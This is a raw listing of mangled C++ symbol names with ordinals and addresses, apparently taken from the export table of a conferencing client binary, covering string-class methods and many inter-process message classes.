              ?npos@?$CStringT@_W@Cmm@@2IB65610x4e4fb8
              ?npos@StringPiece@Cmm@@2IB65620x4e3bd4
              ?pID_@CCmmPerfTelemetry@@0V?$CStringT@D@Cmm@@A65630x5afb20
              ?pPerfTelemetryHelper_@CCmmPerfTelemetry@@0U?$atomic@PAVIPerfTelemetryHelper@@@std@@A65640x5af8ec
              ?pfnGetProcessMemoryInfo_@CCmmPerfTelemetry@@0P6GHPAXPAU_PROCESS_MEMORY_COUNTERS@@K@ZA65650x5af8f4
              ?push_back@?$CStringT@D@Cmm@@QAEXD@Z65660x406d70
              ?push_back@?$CStringT@_W@Cmm@@QAEX_W@Z65670x404fd0
              ?rbegin@?$CStringT@D@Cmm@@QAE?AV?$reverse_iterator@V?$_String_iterator@V?$_String_val@U?$_Simple_types@D@std@@@std@@@std@@@std@@XZ65680x406dc0
              ?rbegin@?$CStringT@D@Cmm@@QBE?AV?$reverse_iterator@V?$_String_const_iterator@V?$_String_val@U?$_Simple_types@D@std@@@std@@@std@@@std@@XZ65690x406dc0
              ?rbegin@?$CStringT@_W@Cmm@@QAE?AV?$reverse_iterator@V?$_String_iterator@V?$_String_val@U?$_Simple_types@_W@std@@@std@@@std@@@std@@XZ65700x405030
              ?rbegin@?$CStringT@_W@Cmm@@QBE?AV?$reverse_iterator@V?$_String_const_iterator@V?$_String_val@U?$_Simple_types@_W@std@@@std@@@std@@@std@@XZ65710x405030
              ?rbegin@StringPiece@Cmm@@QBE?AV?$reverse_iterator@PBD@std@@XZ65720x411260
              ?remove_prefix@StringPiece@Cmm@@QAEXI@Z65730x411160
              ?remove_suffix@StringPiece@Cmm@@QAEXI@Z65740x411170
              ?rend@?$CStringT@D@Cmm@@QAE?AV?$reverse_iterator@V?$_String_iterator@V?$_String_val@U?$_Simple_types@D@std@@@std@@@std@@@std@@XZ65750x406da0
              ?rend@?$CStringT@D@Cmm@@QBE?AV?$reverse_iterator@V?$_String_const_iterator@V?$_String_val@U?$_Simple_types@D@std@@@std@@@std@@@std@@XZ65760x406da0
              ?rend@?$CStringT@_W@Cmm@@QAE?AV?$reverse_iterator@V?$_String_iterator@V?$_String_val@U?$_Simple_types@_W@std@@@std@@@std@@@std@@XZ65770x405010
              ?rend@?$CStringT@_W@Cmm@@QBE?AV?$reverse_iterator@V?$_String_const_iterator@V?$_String_val@U?$_Simple_types@_W@std@@@std@@@std@@@std@@XZ65780x405010
              ?rend@StringPiece@Cmm@@QBE?AV?$reverse_iterator@PBD@std@@XZ65790x411280
              ?replace@?$CStringT@D@Cmm@@QAEAAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IIABV34@@Z65800x406680
              ?replace@?$CStringT@D@Cmm@@QAEAAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IIID@Z65810x406580
              ?replace@?$CStringT@D@Cmm@@QAEAAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IIPBD@Z65820x406610
              ?replace@?$CStringT@D@Cmm@@QAEAAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IIPBDI@Z65830x4065c0
              ?replace@?$CStringT@D@Cmm@@QAEAAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@V?$_String_const_iterator@V?$_String_val@U?$_Simple_types@D@std@@@std@@@4@0ABV34@@Z65840x406640
              ?replace@?$CStringT@D@Cmm@@QAEAAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@V?$_String_const_iterator@V?$_String_val@U?$_Simple_types@D@std@@@std@@@4@0ID@Z65850x406550
              ?replace@?$CStringT@D@Cmm@@QAEAAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@V?$_String_const_iterator@V?$_String_val@U?$_Simple_types@D@std@@@std@@@4@0PBD@Z65860x4065d0
              ?replace@?$CStringT@D@Cmm@@QAEAAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@V?$_String_const_iterator@V?$_String_val@U?$_Simple_types@D@std@@@std@@@4@0PBDI@Z65870x406590
              ?replace@?$CStringT@_W@Cmm@@QAEAAV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@IIABV34@@Z65880x404860
              ?replace@?$CStringT@_W@Cmm@@QAEAAV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@III_W@Z65890x404780
              ?replace@?$CStringT@_W@Cmm@@QAEAAV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@IIPB_W@Z65900x404810
              ?replace@?$CStringT@_W@Cmm@@QAEAAV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@IIPB_WI@Z65910x4047d0
              ?replace@?$CStringT@_W@Cmm@@QAEAAV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@V?$_String_const_iterator@V?$_String_val@U?$_Simple_types@_W@std@@@std@@@4@0ABV34@@Z65920x404820
              ?replace@?$CStringT@_W@Cmm@@QAEAAV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@V?$_String_const_iterator@V?$_String_val@U?$_Simple_types@_W@std@@@std@@@4@0I_W@Z65930x404740
              ?replace@?$CStringT@_W@Cmm@@QAEAAV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@V?$_String_const_iterator@V?$_String_val@U?$_Simple_types@_W@std@@@std@@@4@0PB_W@Z65940x4047e0
              ?replace@?$CStringT@_W@Cmm@@QAEAAV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@V?$_String_const_iterator@V?$_String_val@U?$_Simple_types@_W@std@@@std@@@4@0PB_WI@Z65950x404790
              ?reserve@?$CStringT@D@Cmm@@QAEXI@Z65960x406710
              ?reserve@?$CStringT@_W@Cmm@@QAEXI@Z65970x4048e0
              ?resize@?$CStringT@D@Cmm@@QAEXI@Z65980x405930
              ?resize@?$CStringT@D@Cmm@@QAEXID@Z65990x406de0
              ?resize@?$CStringT@_W@Cmm@@QAEXI@Z66000x403ab0
              ?resize@?$CStringT@_W@Cmm@@QAEXI_W@Z66010x405080
              ?rfind@?$CStringT@D@Cmm@@QBEIABV12@I@Z66020x406720
              ?rfind@?$CStringT@D@Cmm@@QBEIABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@I@Z66030x4067e0
              ?rfind@?$CStringT@D@Cmm@@QBEIDI@Z66040x406740
              ?rfind@?$CStringT@D@Cmm@@QBEIPBDI@Z66050x4067a0
              ?rfind@?$CStringT@D@Cmm@@QBEIPBDII@Z66060x406770
              ?rfind@?$CStringT@_W@Cmm@@QBEIABV12@I@Z66070x404950
              ?rfind@?$CStringT@_W@Cmm@@QBEIABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@I@Z66080x404a10
              ?rfind@?$CStringT@_W@Cmm@@QBEIPB_WI@Z66090x4049d0
              ?rfind@?$CStringT@_W@Cmm@@QBEIPB_WII@Z66100x4049a0
              ?rfind@?$CStringT@_W@Cmm@@QBEI_WI@Z66110x404970
              ?rfind@StringPiece@Cmm@@QBEIABV12@I@Z66120x45a0a0
              ?rfind@StringPiece@Cmm@@QBEIDI@Z66130x45a120
              ?s_firsttime@?1???0CSBMBMessage_AddClientLog@@QAE@XZ@4HA66140x59ea44
              ?s_firsttime@?1???0CSBMBMessage_AddToCameraControlGroup@@QAE@XZ@4HA66150x59eaf0
              ?s_firsttime@?1???0CSBMBMessage_AppSupportNewWhiteBoardSetting@@QAE@XZ@4HA66160x59ea58
              ?s_firsttime@?1???0CSBMBMessage_Assisant_Keybase@@QAE@XZ@4HA66170x59edd4
              ?s_firsttime@?1???0CSBMBMessage_Assistant_Audio_Configure_Request@@QAE@XZ@4HA66180x59ebc0
              ?s_firsttime@?1???0CSBMBMessage_Assistant_Audio_Configure_Response@@QAE@XZ@4HA66190x59eecc
              ?s_firsttime@?1???0CSBMBMessage_Assistant_Broadcast_Bind_Audio_To_Txchannel_Request@@QAE@XZ@4HA66200x59efcc
              ?s_firsttime@?1???0CSBMBMessage_Assistant_Broadcast_Bind_Audio_To_Txchannel_Response@@QAE@XZ@4HA66210x59ea94
              ?s_firsttime@?1???0CSBMBMessage_Assistant_Broadcast_Clear_All_Audio_From_Txchannel_Response@@QAE@XZ@4HA66220x59ea20
              ?s_firsttime@?1???0CSBMBMessage_Assistant_Broadcast_Network_Audio_Config_Proxy_Request@@QAE@XZ@4HA66230x59edf4
              ?s_firsttime@?1???0CSBMBMessage_Assistant_Broadcast_Network_Audio_Config_Proxy_Response@@QAE@XZ@4HA66240x59efc8
              ?s_firsttime@?1???0CSBMBMessage_Assistant_Broadcast_Network_Audio_Stop_Proxy_Response@@QAE@XZ@4HA66250x59ecd0
              ?s_firsttime@?1???0CSBMBMessage_Assistant_Broadcast_Unbind_Audio_From_Txchannel_Request@@QAE@XZ@4HA66260x59ebec
              ?s_firsttime@?1???0CSBMBMessage_Assistant_Broadcast_Unbind_Audio_From_Txchannel_Response@@QAE@XZ@4HA66270x59eb18
              ?s_firsttime@?1???0CSBMBMessage_Assistant_Broadcast_Unbind_Channel_Audio_Request@@QAE@XZ@4HA66280x59ec28
              ?s_firsttime@?1???0CSBMBMessage_Assistant_Broadcast_Unbind_Channel_Audio_Response@@QAE@XZ@4HA66290x59eb30
              ?s_firsttime@?1???0CSBMBMessage_Assistant_CEC_LoadResponse@@QAE@XZ@4HA66300x59f014
              ?s_firsttime@?1???0CSBMBMessage_Assistant_CEC_PowerOnResponse@@QAE@XZ@4HA66310x59ea88
              ?s_firsttime@?1???0CSBMBMessage_Assistant_CEC_StandByResponse@@QAE@XZ@4HA66320x59ef3c
              ?s_firsttime@?1???0CSBMBMessage_Assistant_CEC_UnloadResponse@@QAE@XZ@4HA66330x59eb48
              ?s_firsttime@?1???0CSBMBMessage_Assistant_ControlSystem_CallDeviceSucceedNotify@@QAE@XZ@4HA66340x59ea50
              ?s_firsttime@?1???0CSBMBMessage_Assistant_ControlSystem_DevicesPreparedNotify@@QAE@XZ@4HA66350x59eca8
              ?s_firsttime@?1???0CSBMBMessage_Assistant_ControlSystem_DevicesUpdatedNotify@@QAE@XZ@4HA66360x59ef7c
              ?s_firsttime@?1???0CSBMBMessage_Assistant_ControlSystem_DoOperationRequest@@QAE@XZ@4HA66370x59ed80
              ?s_firsttime@?1???0CSBMBMessage_Assistant_ControlSystem_ExecuteRuleRequest@@QAE@XZ@4HA66380x59eee0
              ?s_firsttime@?1???0CSBMBMessage_Assistant_ControlSystem_ExecuteSceneRequest@@QAE@XZ@4HA66390x59ef0c
              ?s_firsttime@?1???0CSBMBMessage_Assistant_ControlSystem_LoadRequest@@QAE@XZ@4HA66400x59ee04
              ?s_firsttime@?1???0CSBMBMessage_Assistant_ControlSystem_ScenesPreparedNotify@@QAE@XZ@4HA66410x59ece4
              ?s_firsttime@?1???0CSBMBMessage_Assistant_DAL_Service_Conf_Render_Change@@QAE@XZ@4HA66420x59ee30
              ?s_firsttime@?1???0CSBMBMessage_Assistant_DAL_Service_Get_Service_Status_Response@@QAE@XZ@4HA66430x59ecfc
              ?s_firsttime@?1???0CSBMBMessage_Assistant_DAL_Service_Identify_Device_Request@@QAE@XZ@4HA66440x59eae8
              ?s_firsttime@?1???0CSBMBMessage_Assistant_DAL_Service_Identify_Device_Response@@QAE@XZ@4HA66450x59ef84
              ?s_firsttime@?1???0CSBMBMessage_Assistant_DAL_Service_Load_Service_Request@@QAE@XZ@4HA66460x59efe0
              ?s_firsttime@?1???0CSBMBMessage_Assistant_DAL_Service_Load_Service_Response@@QAE@XZ@4HA66470x59ee54
              ?s_firsttime@?1???0CSBMBMessage_Assistant_DAL_Service_Network_Device_Added_Notification@@QAE@XZ@4HA66480x59ec2c
              ?s_firsttime@?1???0CSBMBMessage_Assistant_DAL_Service_Network_Device_List_Refresh_Notification@@QAE@XZ@4HA66490x59ef90
              ?s_firsttime@?1???0CSBMBMessage_Assistant_DAL_Service_Network_Device_Removed_Notification@@QAE@XZ@4HA66500x59ec08
              ?s_firsttime@?1???0CSBMBMessage_Assistant_DAL_Service_Network_Device_Update_Notification@@QAE@XZ@4HA66510x59eacc
              ?s_firsttime@?1???0CSBMBMessage_Assistant_DAL_Service_Service_Components_Change_Notification@@QAE@XZ@4HA66520x59f018
              ?s_firsttime@?1???0CSBMBMessage_Assistant_DAL_Service_Service_Ready_Notification@@QAE@XZ@4HA66530x59ead0
              ?s_firsttime@?1???0CSBMBMessage_Assistant_DAL_Service_Service_Refresh_Device_List_Request@@QAE@XZ@4HA66540x59eaa0
              ?s_firsttime@?1???0CSBMBMessage_Assistant_DAL_Service_Set_Selected_Device_Request@@QAE@XZ@4HA66550x59ed20
              ?s_firsttime@?1???0CSBMBMessage_Assistant_DAL_Service_Set_Selected_Device_Response@@QAE@XZ@4HA66560x59ec14
              ?s_firsttime@?1???0CSBMBMessage_Assistant_DAL_Service_Sip_Audio_Render_Change_Notification@@QAE@XZ@4HA66570x59ebb0
              ?s_firsttime@?1???0CSBMBMessage_Assistant_DAL_Service_Sip_Render_Change@@QAE@XZ@4HA66580x59ee58
              ?s_firsttime@?1???0CSBMBMessage_Assistant_DAL_Service_Unload_Service_Request@@QAE@XZ@4HA66590x59efa8
              ?s_firsttime@?1???0CSBMBMessage_Assistant_DAL_Service_Unload_Service_Response@@QAE@XZ@4HA66600x59eabc
              ?s_firsttime@?1???0CSBMBMessage_Assistant_DAL_Service_Unset_Selected_Device_Request@@QAE@XZ@4HA66610x59ee70
              ?s_firsttime@?1???0CSBMBMessage_Assistant_DAL_Service_Unset_Selected_Device_Response@@QAE@XZ@4HA66620x59ec00
              ?s_firsttime@?1???0CSBMBMessage_Assistant_DAL_Service_Use_Dante_Controller@@QAE@XZ@4HA66630x59eb90
              ?s_firsttime@?1???0CSBMBMessage_Assistant_Exit_Process@@QAE@XZ@4HA66640x59ea54
              ?s_firsttime@?1???0CSBMBMessage_Assistant_LineCallMergedNotification@@QAE@XZ@4HA66650x59eca0
              ?s_firsttime@?1???0CSBMBMessage_Assistant_SIP_AudioDeviceFailNotification@@QAE@XZ@4HA66660x59eab4
              ?s_firsttime@?1???0CSBMBMessage_Assistant_SIP_AutoRecordingEvent@@QAE@XZ@4HA66670x59ef68
              ?s_firsttime@?1???0CSBMBMessage_Assistant_SIP_CallOperationFailNotification@@QAE@XZ@4HA66680x59ecf0
              ?s_firsttime@?1???0CSBMBMessage_Assistant_SIP_CallUpdateKeyValueNotification@@QAE@XZ@4HA66690x59efd4
              ?s_firsttime@?1???0CSBMBMessage_Assistant_SIP_CallUpdateKeyValueNotificationWithCallID@@QAE@XZ@4HA66700x59eb8c
              ?s_firsttime@?1???0CSBMBMessage_Assistant_SIP_CheckNomadic911Request@@QAE@XZ@4HA66710x59eb24
              ?s_firsttime@?1???0CSBMBMessage_Assistant_SIP_JoinMeetingRequest@@QAE@XZ@4HA66720x59eac4
              ?s_firsttime@?1???0CSBMBMessage_Assistant_SIP_LineCallTerminatedNotification@@QAE@XZ@4HA66730x59efac
              ?s_firsttime@?1???0CSBMBMessage_Assistant_SIP_MergeCallHostChanged@@QAE@XZ@4HA66740x59ee60
              ?s_firsttime@?1???0CSBMBMessage_Assistant_SIP_MergeCallResponse@@QAE@XZ@4HA66750x59ec3c
              ?s_firsttime@?1???0CSBMBMessage_Assistant_SIP_MessageCountChanged@@QAE@XZ@4HA66760x59ec88
              ?s_firsttime@?1???0CSBMBMessage_Assistant_SIP_MessageUploadMemLog@@QAE@XZ@4HA66770x59ecc0
              ?s_firsttime@?1???0CSBMBMessage_Assistant_SIP_OnCallIncomingNotification@@QAE@XZ@4HA66780x59ec64
              ?s_firsttime@?1???0CSBMBMessage_Assistant_SIP_OnCallMediaStatusUpdateNotification@@QAE@XZ@4HA66790x59f004
              ?s_firsttime@?1???0CSBMBMessage_Assistant_SIP_OnCallRecordingResultNotification@@QAE@XZ@4HA66800x59ea8c
              ?s_firsttime@?1???0CSBMBMessage_Assistant_SIP_OnCallRecordingStatusUpdateNotification@@QAE@XZ@4HA66810x59eef4
              ?s_firsttime@?1???0CSBMBMessage_Assistant_SIP_OnCallStatusUpdateNotification@@QAE@XZ@4HA66820x59ebc8
              ?s_firsttime@?1???0CSBMBMessage_Assistant_SIP_OnCallTransferResultNotification@@QAE@XZ@4HA66830x59ecf4
              ?s_firsttime@?1???0CSBMBMessage_Assistant_SIP_OnRegistrarNotification@@QAE@XZ@4HA66840x59eb4c
              ?s_firsttime@?1???0CSBMBMessage_Assistant_SIP_OnSIPServiceStatusChangedNotification@@QAE@XZ@4HA66850x59eca4
              ?s_firsttime@?1???0CSBMBMessage_Assistant_SIP_ReceiveRealtimePolicesNotification@@QAE@XZ@4HA66860x59ef40
              ?s_firsttime@?1???0CSBMBMessage_Assistant_SIP_RemoteMergerEvent@@QAE@XZ@4HA66870x59effc
              ?s_firsttime@?1???0CSBMBMessage_Assistant_SIP_SuspendToResume@@QAE@XZ@4HA66880x59eba4
              ?s_firsttime@?1???0CSBMBMessage_Assistant_SIP_SwitchCallToCarrierResponse@@QAE@XZ@4HA66890x59ed60
              ?s_firsttime@?1???0CSBMBMessage_Assistant_SIP_UpgradeToMeetingRequest@@QAE@XZ@4HA66900x59ea70
              ?s_firsttime@?1???0CSBMBMessage_Assistant_SIP_Virtual_Microphone_Create_Request@@QAE@XZ@4HA66910x59ed58
              ?s_firsttime@?1???0CSBMBMessage_Assistant_SIP_Virtual_Microphone_Created_Notification@@QAE@XZ@4HA66920x59ea48
              ?s_firsttime@?1???0CSBMBMessage_Assistant_SIP_Virtual_Microphone_Destroy_Request@@QAE@XZ@4HA66930x59ec6c
              ?s_firsttime@?1???0CSBMBMessage_Assistant_SIP_Virtual_Microphone_Error_Notification@@QAE@XZ@4HA66940x59ea78
              ?s_firsttime@?1???0CSBMBMessage_Assistant_SIP_Virtual_Speaker_Create_Request@@QAE@XZ@4HA66950x59eae4
              ?s_firsttime@?1???0CSBMBMessage_Assistant_SIP_Virtual_Speaker_Destroy_Request@@QAE@XZ@4HA66960x59ec60
              ?s_firsttime@?1???0CSBMBMessage_Assistant_SIP_WMIActive@@QAE@XZ@4HA66970x59edbc
              ?s_firsttime@?1???0CSBMBMessage_Assistant_Virtual_Audio_Register_Capturer_Proxy_Response@@QAE@XZ@4HA66980x59eaec
              ?s_firsttime@?1???0CSBMBMessage_Assistant_Virtual_Audio_Start_Capture_Response@@QAE@XZ@4HA66990x59eee8
              ?s_firsttime@?1???0CSBMBMessage_Assistant_Virtual_Audio_Stop_Capture_Response@@QAE@XZ@4HA67000x59ee78
              ?s_firsttime@?1???0CSBMBMessage_Assistant_Voice_Command_Action_Request@@QAE@XZ@4HA67010x59eaa4
              ?s_firsttime@?1???0CSBMBMessage_Assistant_Voice_Command_Data_Request@@QAE@XZ@4HA67020x59ec30
              ?s_firsttime@?1???0CSBMBMessage_Assistant_Voice_Command_Data_Response@@QAE@XZ@4HA67030x59ec8c
              ?s_firsttime@?1???0CSBMBMessage_Assistant_Voice_Command_Start_Request@@QAE@XZ@4HA67040x59ed90
              ?s_firsttime@?1???0CSBMBMessage_Assistant_Voice_Command_Status_Notification@@QAE@XZ@4HA67050x59ed38
              ?s_firsttime@?1???0CSBMBMessage_Assistant_Voice_Command_UI_Update_Request@@QAE@XZ@4HA67060x59efec
              ?s_firsttime@?1???0CSBMBMessage_Audio3rdSDK_AudioCmdNotify@@QAE@XZ@4HA67070x59efa4
              ?s_firsttime@?1???0CSBMBMessage_Audio3rdSDK_AudioCmdRequest@@QAE@XZ@4HA67080x59eeb0
              ?s_firsttime@?1???0CSBMBMessage_AudioFacilityStatus@@QAE@XZ@4HA67090x59ef38
              ?s_firsttime@?1???0CSBMBMessage_AvatarDataRequest@@QAE@XZ@4HA67100x59ebbc
              ?s_firsttime@?1???0CSBMBMessage_AvatarDataResponse@@QAE@XZ@4HA67110x59eb3c
              ?s_firsttime@?1???0CSBMBMessage_CCIScreenRecordingNotify@@QAE@XZ@4HA67120x59edb4
              ?s_firsttime@?1???0CSBMBMessage_CCIScreenRecordingRequest@@QAE@XZ@4HA67130x59ecf8
              ?s_firsttime@?1???0CSBMBMessage_CCIVideoAssignAndNotify@@QAE@XZ@4HA67140x59eb04
              ?s_firsttime@?1???0CSBMBMessage_CCIVideoAudioChangeNotify@@QAE@XZ@4HA67150x59ed00
              ?s_firsttime@?1???0CSBMBMessage_CCIVideoCancelInviteByPhoneRequest@@QAE@XZ@4HA67160x59ee90
              ?s_firsttime@?1???0CSBMBMessage_CCIVideoChangeBtnStatusRequest@@QAE@XZ@4HA67170x59ecc8
              ?s_firsttime@?1???0CSBMBMessage_CCIVideoChangeHostRequest@@QAE@XZ@4HA67180x59edd0
              ?s_firsttime@?1???0CSBMBMessage_CCIVideoChangeRecordStatusRequest@@QAE@XZ@4HA67190x59eec4
              ?s_firsttime@?1???0CSBMBMessage_CCIVideoCreateEmbedWindowNotify@@QAE@XZ@4HA67200x59eed8
              ?s_firsttime@?1???0CSBMBMessage_CCIVideoCreateEmbedWindowRequest@@QAE@XZ@4HA67210x59ef98
              ?s_firsttime@?1???0CSBMBMessage_CCIVideoDestroyEmbedWindowNotify@@QAE@XZ@4HA67220x59ef48
              ?s_firsttime@?1???0CSBMBMessage_CCIVideoDestroyEmbedWindowRequest@@QAE@XZ@4HA67230x59eec8
              ?s_firsttime@?1???0CSBMBMessage_CCIVideoEmbedWindowSendMsgRequest@@QAE@XZ@4HA67240x59ec38
              ?s_firsttime@?1???0CSBMBMessage_CCIVideoEndDropDownClickBtnNotify@@QAE@XZ@4HA67250x59ec18
              ?s_firsttime@?1???0CSBMBMessage_CCIVideoEndDropdownButtonClickConfirmRequest@@QAE@XZ@4HA67260x59eb2c
              ?s_firsttime@?1???0CSBMBMessage_CCIVideoEndVideoNotify@@QAE@XZ@4HA67270x59ea14
              ?s_firsttime@?1???0CSBMBMessage_CCIVideoEndVideoRequest@@QAE@XZ@4HA67280x59eb9c
              ?s_firsttime@?1???0CSBMBMessage_CCIVideoEventReportNotify@@QAE@XZ@4HA67290x59eadc
              ?s_firsttime@?1???0CSBMBMessage_CCIVideoGetCurrentUserRequest@@QAE@XZ@4HA67300x59efbc
              ?s_firsttime@?1???0CSBMBMessage_CCIVideoGetCurrentUserResponse@@QAE@XZ@4HA67310x59ece0
              ?s_firsttime@?1???0CSBMBMessage_CCIVideoGetSupportCountryInfoRequest@@QAE@XZ@4HA67320x59ea18
              ?s_firsttime@?1???0CSBMBMessage_CCIVideoGetSupportCountryInfoResponse@@QAE@XZ@4HA67330x59efe8
              ?s_firsttime@?1???0CSBMBMessage_CCIVideoGetUserListRequest@@QAE@XZ@4HA67340x59ebdc
              ?s_firsttime@?1???0CSBMBMessage_CCIVideoGetUserListResponse@@QAE@XZ@4HA67350x59ed98
              ?s_firsttime@?1???0CSBMBMessage_CCIVideoHoldStatusChangeNotify@@QAE@XZ@4HA67360x59ef70
              ?s_firsttime@?1???0CSBMBMessage_CCIVideoHostChangeNotify@@QAE@XZ@4HA67370x59eb84
              ?s_firsttime@?1???0CSBMBMessage_CCIVideoInviteByPhoneRequest@@QAE@XZ@4HA67380x59eaf8
              ?s_firsttime@?1???0CSBMBMessage_CCIVideoInviteByPhoneStatusNotify@@QAE@XZ@4HA67390x59ee68
              ?s_firsttime@?1???0CSBMBMessage_CCIVideoJoinMeetingRequest@@QAE@XZ@4HA67400x59eccc
              ?s_firsttime@?1???0CSBMBMessage_CCIVideoJoinMeetingResponse@@QAE@XZ@4HA67410x59ea7c
              ?s_firsttime@?1???0CSBMBMessage_CCIVideoMuteAudioRequest@@QAE@XZ@4HA67420x59ec90
              ?s_firsttime@?1???0CSBMBMessage_CCIVideoOnClosedCaptionChanged@@QAE@XZ@4HA67430x59eb44
              ?s_firsttime@?1???0CSBMBMessage_CCIVideoOnEmbedWindowSendMsgRequest@@QAE@XZ@4HA67440x59ed94
              ?s_firsttime@?1???0CSBMBMessage_CCIVideoOnLiveCaptionChange@@QAE@XZ@4HA67450x59ec7c
              ?s_firsttime@?1???0CSBMBMessage_CCIVideoOnLiveTranscriptionMsgError@@QAE@XZ@4HA67460x59ebc4
              ?s_firsttime@?1???0CSBMBMessage_CCIVideoOnLiveTranscriptionMsgReceived@@QAE@XZ@4HA67470x59ea64
              ?s_firsttime@?1???0CSBMBMessage_CCIVideoOnLiveTranscriptionStatusNotify@@QAE@XZ@4HA67480x59ed3c
              ?s_firsttime@?1???0CSBMBMessage_CCIVideoOnUserJoinNotify@@QAE@XZ@4HA67490x59edd8
              ?s_firsttime@?1???0CSBMBMessage_CCIVideoOnUserLeaveNotify@@QAE@XZ@4HA67500x59efd0
              ?s_firsttime@?1???0CSBMBMessage_CCIVideoOnUserUpdatedNotify@@QAE@XZ@4HA67510x59ec50
              ?s_firsttime@?1???0CSBMBMessage_CCIVideoOpenURLWithDefaultBrowser@@QAE@XZ@4HA67520x59ef4c
              ?s_firsttime@?1???0CSBMBMessage_CCIVideoPTQuitNotify@@QAE@XZ@4HA67530x59ea34
              ?s_firsttime@?1???0CSBMBMessage_CCIVideoReceiveCommandNotify@@QAE@XZ@4HA67540x59ec94
              ?s_firsttime@?1???0CSBMBMessage_CCIVideoRecordingStateChangeNotify@@QAE@XZ@4HA67550x59ec44
              ?s_firsttime@?1???0CSBMBMessage_CCIVideoRemoveUserRequest@@QAE@XZ@4HA67560x59ef74
              ?s_firsttime@?1???0CSBMBMessage_CCIVideoSendCommandRequest@@QAE@XZ@4HA67570x59ee24
              ?s_firsttime@?1???0CSBMBMessage_CCIVideoSetDomainRequest@@QAE@XZ@4HA67580x59efdc
              ?s_firsttime@?1???0CSBMBMessage_CCIVideoSetEndButtonDropdowRequest@@QAE@XZ@4HA67590x59ea84
              ?s_firsttime@?1???0CSBMBMessage_CCIVideoSetEndButtonTextRequest@@QAE@XZ@4HA67600x59eb28
              ?s_firsttime@?1???0CSBMBMessage_CCIVideoSetFullScreenRequest@@QAE@XZ@4HA67610x59ee20
              ?s_firsttime@?1???0CSBMBMessage_CCIVideoSetVBRequest@@QAE@XZ@4HA67620x59ebcc
              ?s_firsttime@?1???0CSBMBMessage_CCIVideoSettingsSyncFromPTRequest@@QAE@XZ@4HA67630x59ec40
              ?s_firsttime@?1???0CSBMBMessage_CCIVideoSettingsSyncToPTRequest@@QAE@XZ@4HA67640x59eafc
              ?s_firsttime@?1???0CSBMBMessage_CCIVideoShowEmbedWindowNotify@@QAE@XZ@4HA67650x59ecb8
              ?s_firsttime@?1???0CSBMBMessage_CCIVideoShowEmbedWindowRequest@@QAE@XZ@4HA67660x59eb38
              ?s_firsttime@?1???0CSBMBMessage_CCIVideoUseAudioRequest@@QAE@XZ@4HA67670x59ee98
              ?s_firsttime@?1???0CSBMBMessage_CCIVideoUserDataUpdateNotify@@QAE@XZ@4HA67680x59eb0c
              ?s_firsttime@?1???0CSBMBMessage_CCIVideoWarmTransferNotify@@QAE@XZ@4HA67690x59ef64
              ?s_firsttime@?1???0CSBMBMessage_CCIVideoWarmTransferRequest@@QAE@XZ@4HA67700x59eb6c
              ?s_firsttime@?1???0CSBMBMessage_CDNEventIndication@@QAE@XZ@4HA67710x59ea28
              ?s_firsttime@?1???0CSBMBMessage_CameraControlGroupAdded@@QAE@XZ@4HA67720x59ed68
              ?s_firsttime@?1???0CSBMBMessage_CameraControlGroupFetched@@QAE@XZ@4HA67730x59ee00
              ?s_firsttime@?1???0CSBMBMessage_CameraControlGroupRemoved@@QAE@XZ@4HA67740x59ea08
              ?s_firsttime@?1???0CSBMBMessage_CancelDownloadComponent@@QAE@XZ@4HA67750x59ed64
              ?s_firsttime@?1???0CSBMBMessage_ChatWithBuddy@@QAE@XZ@4HA67760x59ec10
              ?s_firsttime@?1???0CSBMBMessage_CheckInSessionReq@@QAE@XZ@4HA67770x59eec0
              ?s_firsttime@?1???0CSBMBMessage_CheckInSessionRsp@@QAE@XZ@4HA67780x59ef28
              ?s_firsttime@?1???0CSBMBMessage_CheckNomadic911_Notification@@QAE@XZ@4HA67790x59ead8
              ?s_firsttime@?1???0CSBMBMessage_Client3rdSDK_SDKCmdNotify@@QAE@XZ@4HA67800x59ebd0
              ?s_firsttime@?1???0CSBMBMessage_Client3rdSDK_SDKCmdRequest@@QAE@XZ@4HA67810x59eb20
              ?s_firsttime@?1???0CSBMBMessage_CompanionTokenRequest@@QAE@XZ@4HA67820x59ea1c
              ?s_firsttime@?1???0CSBMBMessage_CompanionTokenResponse@@QAE@XZ@4HA67830x59ef58
              ?s_firsttime@?1???0CSBMBMessage_ComponentDownloadResult@@QAE@XZ@4HA67840x59eef0
              ?s_firsttime@?1???0CSBMBMessage_ConfGetZRMeetingInfoReq@@QAE@XZ@4HA67850x59ea2c
              ?s_firsttime@?1???0CSBMBMessage_ConfInterProcessAudioSharingServiceRegisterRequest@@QAE@XZ@4HA67860x59ebb4
              ?s_firsttime@?1???0CSBMBMessage_ConfInterProcessAudioSharingServiceRegisterResponse@@QAE@XZ@4HA67870x59ef34
              ?s_firsttime@?1???0CSBMBMessage_ConfInterProcessAudioSharingServiceUnregisterResponse@@QAE@XZ@4HA67880x59ef04
              ?s_firsttime@?1???0CSBMBMessage_ConfirmConfLeave@@QAE@XZ@4HA67890x59ed18
              ?s_firsttime@?1???0CSBMBMessage_ConfirmRecaptcha@@QAE@XZ@4HA67900x59edf8
              ?s_firsttime@?1???0CSBMBMessage_Doc2ImgCancelConvertRequest@@QAE@XZ@4HA67910x59eb14
              ?s_firsttime@?1???0CSBMBMessage_Doc2ImgCancelConvertResponse@@QAE@XZ@4HA67920x59eee4
